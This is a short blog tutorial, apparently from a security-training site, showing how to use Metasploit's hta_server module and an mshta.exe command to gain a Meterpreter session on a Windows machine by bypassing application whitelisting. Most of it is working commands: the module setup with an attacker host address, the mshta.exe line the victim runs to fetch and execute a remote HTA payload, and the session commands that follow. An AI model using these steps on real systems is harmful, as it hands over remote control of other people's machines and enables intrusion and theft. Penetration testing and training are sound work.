| Blog ,Members Only

Reviewing a bit of everything I found something interesting that we should know, and above all very simple.

mshta.exe HTA is a useful and important attack because it can bypass application whitelisting.

The first thing we have is to open a terminal and write the following command to start metasploit, in case you don’t have it installed then your first step would be to install metasploit.

msfconsole

Then we write the following commands which are easy to understand each one of them.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.100.4
msf exploit(windows/misc/hta_server) > exploit

Then we go to the victim team and execute the following command.

mshta.exe //192.168.100.4:8080/oOmxE9j8KO.hta

After we have written the previous command in the victim team, we immediately have our meterpreter session to start looking for anything we want.

with the following command list all the sessions we have open.

sessions

in this case we only have one

sessions 1

If you are interested in continuing to learn this type of hacking tricks, do not forget to visit our website.

Related infoscaddicts courses:

https://infosecaddicts.com/category/members-only/ 

https://infosecaddicts.com/course/4-for-50/ 

References:

http://blog.sevagas.com/?Hacking-around-HTA-files